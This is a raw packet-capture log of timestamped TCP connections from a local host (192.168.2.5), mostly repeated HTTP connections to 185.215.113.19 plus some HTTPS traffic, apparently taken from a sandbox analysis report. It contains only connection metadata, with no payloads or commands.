Sep 1, 2024 06:29:14.313455105 CEST	443	49812	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:14.313704967 CEST	49813	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:14.313735008 CEST	49812	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:14.313750982 CEST	443	49813	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:14.313802958 CEST	49813	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:14.314265966 CEST	49812	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:14.314279079 CEST	443	49812	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:14.314395905 CEST	49813	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:14.314409018 CEST	443	49813	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:14.451003075 CEST	80	49811	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:14.451270103 CEST	49811	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:14.451461077 CEST	80	49811	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:14.451550007 CEST	49811	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:14.456204891 CEST	49811	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:14.456499100 CEST	49814	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:14.461494923 CEST	80	49811	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:14.461615086 CEST	49811	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:14.461738110 CEST	80	49814	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:14.461800098 CEST	49814	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:14.461930037 CEST	49814	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:14.466850996 CEST	80	49814	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:14.926059008 CEST	443	49813	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:14.926436901 CEST	49813	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:14.926450968 CEST	443	49813	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:14.926793098 CEST	443	49813	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:14.927206039 CEST	49813	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:14.927263021 CEST	443	49813	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:14.931869984 CEST	443	49812	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:14.932126045 CEST	49812	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:14.932140112 CEST	443	49812	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:14.932454109 CEST	443	49812	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:14.932897091 CEST	49812	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:14.932959080 CEST	443	49812	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:15.015954971 CEST	49812	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:15.027208090 CEST	49813	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:15.227174997 CEST	80	49814	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:15.227247953 CEST	49814	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:15.737654924 CEST	49814	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:15.737936020 CEST	49816	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:15.742872953 CEST	80	49816	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:15.743230104 CEST	80	49814	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:15.743303061 CEST	49814	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:15.743311882 CEST	49816	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:15.743700981 CEST	49816	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:15.748878002 CEST	80	49816	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:16.491440058 CEST	80	49816	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:16.492808104 CEST	49816	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:16.495136976 CEST	49816	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:16.495264053 CEST	49817	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:16.502233982 CEST	80	49816	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:16.502640963 CEST	80	49817	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:16.502698898 CEST	49816	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:16.502732038 CEST	49817	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:16.502943039 CEST	49817	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:16.508017063 CEST	80	49817	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:16.726655006 CEST	49818	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:29:16.726696014 CEST	443	49818	162.159.61.3	192.168.2.5
Sep 1, 2024 06:29:16.726756096 CEST	49818	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:29:16.728761911 CEST	49819	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:29:16.728784084 CEST	443	49819	162.159.61.3	192.168.2.5
Sep 1, 2024 06:29:16.728837967 CEST	49819	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:29:16.739075899 CEST	49819	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:29:16.739089966 CEST	443	49819	162.159.61.3	192.168.2.5
Sep 1, 2024 06:29:16.739532948 CEST	49818	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:29:16.739547968 CEST	443	49818	162.159.61.3	192.168.2.5
Sep 1, 2024 06:29:17.196517944 CEST	443	49818	162.159.61.3	192.168.2.5
Sep 1, 2024 06:29:17.197048903 CEST	49818	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:29:17.197067022 CEST	443	49818	162.159.61.3	192.168.2.5
Sep 1, 2024 06:29:17.197398901 CEST	443	49818	162.159.61.3	192.168.2.5
Sep 1, 2024 06:29:17.200997114 CEST	49818	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:29:17.201059103 CEST	443	49818	162.159.61.3	192.168.2.5
Sep 1, 2024 06:29:17.204355955 CEST	443	49819	162.159.61.3	192.168.2.5
Sep 1, 2024 06:29:17.204895973 CEST	49819	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:29:17.204905987 CEST	443	49819	162.159.61.3	192.168.2.5
Sep 1, 2024 06:29:17.205219984 CEST	443	49819	162.159.61.3	192.168.2.5
Sep 1, 2024 06:29:17.209255934 CEST	49819	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:29:17.209315062 CEST	443	49819	162.159.61.3	192.168.2.5
Sep 1, 2024 06:29:17.255386114 CEST	80	49817	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:17.255507946 CEST	49817	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:17.276400089 CEST	49820	443	192.168.2.5	23.55.235.170
Sep 1, 2024 06:29:17.276433945 CEST	443	49820	23.55.235.170	192.168.2.5
Sep 1, 2024 06:29:17.276494980 CEST	49820	443	192.168.2.5	23.55.235.170
Sep 1, 2024 06:29:17.276654959 CEST	49820	443	192.168.2.5	23.55.235.170
Sep 1, 2024 06:29:17.276664019 CEST	443	49820	23.55.235.170	192.168.2.5
Sep 1, 2024 06:29:17.323676109 CEST	49819	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:29:17.373155117 CEST	49817	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:17.373423100 CEST	49821	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:17.378242016 CEST	80	49817	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:17.378328085 CEST	49817	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:17.378509998 CEST	80	49821	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:17.378618956 CEST	49821	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:17.378817081 CEST	49821	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:17.383786917 CEST	80	49821	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:17.401807070 CEST	49818	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:29:17.738985062 CEST	443	49820	23.55.235.170	192.168.2.5
Sep 1, 2024 06:29:17.742922068 CEST	49820	443	192.168.2.5	23.55.235.170
Sep 1, 2024 06:29:17.742934942 CEST	443	49820	23.55.235.170	192.168.2.5
Sep 1, 2024 06:29:17.743243933 CEST	443	49820	23.55.235.170	192.168.2.5
Sep 1, 2024 06:29:17.743738890 CEST	49820	443	192.168.2.5	23.55.235.170
Sep 1, 2024 06:29:17.743793011 CEST	443	49820	23.55.235.170	192.168.2.5
Sep 1, 2024 06:29:17.744077921 CEST	49820	443	192.168.2.5	23.55.235.170
Sep 1, 2024 06:29:17.784508944 CEST	443	49820	23.55.235.170	192.168.2.5
Sep 1, 2024 06:29:17.886421919 CEST	443	49820	23.55.235.170	192.168.2.5
Sep 1, 2024 06:29:17.886486053 CEST	443	49820	23.55.235.170	192.168.2.5
Sep 1, 2024 06:29:17.886529922 CEST	49820	443	192.168.2.5	23.55.235.170
Sep 1, 2024 06:29:17.898082018 CEST	49820	443	192.168.2.5	23.55.235.170
Sep 1, 2024 06:29:17.898097992 CEST	443	49820	23.55.235.170	192.168.2.5
Sep 1, 2024 06:29:18.155459881 CEST	80	49821	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:18.156352043 CEST	49821	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:18.247665882 CEST	49821	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:18.247932911 CEST	49822	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:18.252608061 CEST	80	49821	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:18.252672911 CEST	49821	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:18.252974987 CEST	80	49822	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:18.253034115 CEST	49822	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:18.253329992 CEST	49822	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:18.258280993 CEST	80	49822	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:19.001241922 CEST	80	49822	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:19.001310110 CEST	49822	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:19.112454891 CEST	49822	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:19.112739086 CEST	49823	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:19.117779970 CEST	80	49823	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:19.117789984 CEST	80	49822	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:19.117851019 CEST	49822	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:19.117858887 CEST	49823	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:19.118055105 CEST	49823	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:19.123054981 CEST	80	49823	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:19.878963947 CEST	80	49823	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:19.879250050 CEST	49823	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:19.882014036 CEST	49823	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:19.882318020 CEST	49824	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:19.887309074 CEST	80	49824	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:19.887391090 CEST	49824	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:19.887425900 CEST	80	49823	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:19.887469053 CEST	49823	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:19.887573004 CEST	49824	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:19.892621994 CEST	80	49824	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:20.632952929 CEST	80	49824	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:20.633115053 CEST	49824	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:20.748255014 CEST	49824	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:20.748683929 CEST	49825	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:20.754260063 CEST	80	49824	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:20.754699945 CEST	80	49825	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:20.754757881 CEST	49824	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:20.754781961 CEST	49825	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:20.755028009 CEST	49825	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:20.761013031 CEST	80	49825	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:21.499407053 CEST	80	49825	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:21.499582052 CEST	49825	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:21.502094984 CEST	49825	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:21.502338886 CEST	49826	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:21.508455038 CEST	80	49825	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:21.508647919 CEST	49825	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:21.508692026 CEST	80	49826	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:21.508951902 CEST	49826	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:21.509162903 CEST	49826	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:21.514321089 CEST	80	49826	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:22.265548944 CEST	80	49826	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:22.265608072 CEST	49826	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:22.293138027 CEST	49758	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:22.293157101 CEST	443	49758	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:22.324342012 CEST	49757	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:22.324350119 CEST	443	49757	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:22.373773098 CEST	49826	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:22.374089956 CEST	49827	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:22.378874063 CEST	80	49826	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:22.378926992 CEST	49826	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:22.379095078 CEST	80	49827	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:22.379270077 CEST	49827	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:22.380023003 CEST	49827	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:22.385073900 CEST	80	49827	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:23.156466961 CEST	80	49827	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:23.156533003 CEST	49827	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:23.158818007 CEST	49827	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:23.159080029 CEST	49828	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:23.163846970 CEST	80	49827	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:23.163913012 CEST	49827	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:23.164139986 CEST	80	49828	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:23.164246082 CEST	49828	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:23.164529085 CEST	49828	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:23.169399977 CEST	80	49828	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:23.905347109 CEST	80	49828	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:23.905421972 CEST	49828	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:24.017556906 CEST	49828	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:24.017849922 CEST	49829	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:24.022835016 CEST	80	49828	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:24.022953987 CEST	49828	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:24.023111105 CEST	80	49829	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:24.023298979 CEST	49829	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:24.023545980 CEST	49829	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:24.028454065 CEST	80	49829	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:24.763540983 CEST	80	49829	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:24.763595104 CEST	49829	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:24.776885033 CEST	49829	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:24.777172089 CEST	49830	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:24.782016039 CEST	80	49829	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:24.782107115 CEST	49829	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:24.782282114 CEST	80	49830	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:24.782340050 CEST	49830	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:24.797278881 CEST	49830	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:24.802213907 CEST	80	49830	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:25.546262980 CEST	80	49830	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:25.546312094 CEST	49830	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:25.665060997 CEST	49830	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:25.668859959 CEST	49831	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:25.670382977 CEST	80	49830	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:25.670456886 CEST	49830	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:25.673752069 CEST	80	49831	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:25.674602985 CEST	49831	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:25.675277948 CEST	49831	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:25.680079937 CEST	80	49831	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:26.413561106 CEST	80	49831	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:26.413625956 CEST	49831	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:26.416425943 CEST	49831	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:26.421403885 CEST	80	49831	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:26.662632942 CEST	80	49831	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:26.662698030 CEST	49831	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:26.780044079 CEST	49831	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:26.780294895 CEST	49832	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:26.785665035 CEST	80	49831	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:26.785677910 CEST	80	49832	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:26.785723925 CEST	49831	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:26.785773039 CEST	49832	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:26.785995960 CEST	49832	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:26.790878057 CEST	80	49832	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:27.526109934 CEST	80	49832	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:27.526173115 CEST	49832	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:27.528912067 CEST	49832	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:27.529185057 CEST	49833	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:27.538563013 CEST	80	49833	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:27.538635969 CEST	49833	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:27.538860083 CEST	49833	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:27.540208101 CEST	80	49832	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:27.540721893 CEST	49832	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:27.546075106 CEST	80	49833	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:28.311253071 CEST	80	49833	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:28.311304092 CEST	49833	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:28.445138931 CEST	49833	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:28.445483923 CEST	49834	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:28.450526953 CEST	80	49833	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:28.450560093 CEST	80	49834	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:28.450608969 CEST	49833	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:28.450671911 CEST	49834	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:28.451148033 CEST	49834	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:28.456096888 CEST	80	49834	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:29.409816027 CEST	80	49834	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:29.409879923 CEST	49834	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:29.410362959 CEST	80	49834	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:29.410412073 CEST	49834	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:29.413413048 CEST	49834	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:29.413914919 CEST	49835	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:29.418493986 CEST	80	49834	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:29.418570995 CEST	49834	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:29.418776989 CEST	80	49835	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:29.419233084 CEST	49835	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:29.440382957 CEST	49835	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:29.445430040 CEST	80	49835	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:29.834116936 CEST	443	49813	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:29.834198952 CEST	443	49813	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:29.834242105 CEST	49813	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:29.835506916 CEST	443	49812	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:29.835571051 CEST	443	49812	172.64.41.3	192.168.2.5
Sep 1, 2024 06:29:29.835617065 CEST	49812	443	192.168.2.5	172.64.41.3
Sep 1, 2024 06:29:30.184772968 CEST	80	49835	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:30.184829950 CEST	49835	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:30.295649052 CEST	49835	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:30.295950890 CEST	49836	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:30.300674915 CEST	80	49835	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:30.300724030 CEST	49835	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:30.300977945 CEST	80	49836	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:30.301031113 CEST	49836	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:30.301206112 CEST	49836	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:30.306071997 CEST	80	49836	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:31.043066978 CEST	80	49836	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:31.043138027 CEST	49836	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:31.045577049 CEST	49836	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:31.045895100 CEST	49837	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:31.050734043 CEST	80	49836	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:31.050939083 CEST	80	49837	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:31.050977945 CEST	49836	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:31.051009893 CEST	49837	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:31.051265955 CEST	49837	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:31.056792974 CEST	80	49837	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:31.821625948 CEST	80	49837	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:31.821677923 CEST	49837	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:32.106250048 CEST	443	49818	162.159.61.3	192.168.2.5
Sep 1, 2024 06:29:32.106323957 CEST	443	49818	162.159.61.3	192.168.2.5
Sep 1, 2024 06:29:32.106372118 CEST	49818	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:29:32.112314939 CEST	443	49819	162.159.61.3	192.168.2.5
Sep 1, 2024 06:29:32.112376928 CEST	443	49819	162.159.61.3	192.168.2.5
Sep 1, 2024 06:29:32.112428904 CEST	49819	443	192.168.2.5	162.159.61.3
Sep 1, 2024 06:29:32.281534910 CEST	49837	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:32.281821012 CEST	49838	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:32.286869049 CEST	80	49837	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:32.286927938 CEST	49837	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:32.287048101 CEST	80	49838	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:32.287117004 CEST	49838	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:32.287226915 CEST	49838	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:32.292247057 CEST	80	49838	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:33.746697903 CEST	80	49838	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:33.746712923 CEST	80	49838	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:33.746721029 CEST	80	49838	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:33.746756077 CEST	49838	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:33.746783972 CEST	49838	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:33.750849009 CEST	49838	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:33.751862049 CEST	49839	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:33.994553089 CEST	80	49838	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:33.994613886 CEST	49838	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:34.105938911 CEST	49838	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:34.242394924 CEST	80	49839	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:34.242505074 CEST	49839	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:34.243176937 CEST	80	49838	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:34.243186951 CEST	80	49838	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:34.243238926 CEST	49838	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:34.243254900 CEST	49838	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:34.244380951 CEST	80	49838	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:34.246123075 CEST	49839	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:34.250402927 CEST	80	49838	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:34.255177975 CEST	80	49839	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:35.027827024 CEST	80	49839	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:35.027874947 CEST	49839	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:35.143646955 CEST	49839	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:35.143935919 CEST	49840	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:35.149097919 CEST	80	49839	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:35.149142981 CEST	49839	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:35.149245024 CEST	80	49840	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:35.149302959 CEST	49840	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:35.149516106 CEST	49840	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:35.154409885 CEST	80	49840	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:35.912060976 CEST	80	49840	185.215.113.19	192.168.2.5
Sep 1, 2024 06:29:35.912163973 CEST	49840	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:35.915465117 CEST	49840	80	192.168.2.5	185.215.113.19
Sep 1, 2024 06:29:35.915738106 CEST	49841	80	192.168.2.5	185.215.113.19
